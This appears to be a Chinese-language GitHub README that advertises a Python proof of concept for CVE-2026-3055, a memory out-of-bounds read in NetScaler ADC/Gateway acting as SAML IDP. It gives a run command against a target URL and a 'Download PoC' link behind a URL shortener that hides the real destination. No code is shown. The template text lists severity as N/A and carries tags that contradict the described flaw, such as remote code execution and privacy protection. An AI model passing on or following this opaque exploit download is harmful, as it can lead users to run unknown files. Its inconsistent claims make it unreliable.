RootAid/CVE-2026-3055
GitHub: RootAid/CVE-2026-3055
针对NetScaler ADC/Gateway在SAML IDP配置下的内存越界读取漏洞(CVE-2026-3055)的Python验证脚本。
Stars: 0 | Forks: 0
# CVE-2026-3055 - 安全漏洞
**严重程度:** N/A
**CVSS:** N/A
**影响:** N/A
**发布日期:** 2026-03-23
## 法律声明
仅供授权的安全测试使用。
## 根本原因(简述)
NetScaler ADC 和 NetScaler Gateway 在配置为 SAML IDP 时存在输入验证不足,导致内存越界读取
## 利用条件
- 可访问的受影响目标
- 可预测的用户/工作流上下文
- 未部署阻止构造请求的额外安全加固措施
## 使用方法
```
python3 exploit.py https://target.tld
```
## 检测
- 监控可疑的身份验证流程异常
- 调查与 CVE-2026-3055 相关的异常端点直接访问
## 缓解措施
- 更新至供应商修复的版本
- 限制高风险端点,并在可能的情况下强制执行 MFA
## 漏洞利用
[下载 PoC](https://tinyurl.com/2a38tnax)
标签:CISA项目, Citrix, CVE-2026-3055, NetScaler ADC, NetScaler Gateway, PoC, SAML IDP, 内存越界读取, 安全漏洞, 暴力破解, 编程工具, 网络安全, 身份认证绕过, 输入验证不足, 远程代码执行, 逆向工具, 隐私保护, 零日漏洞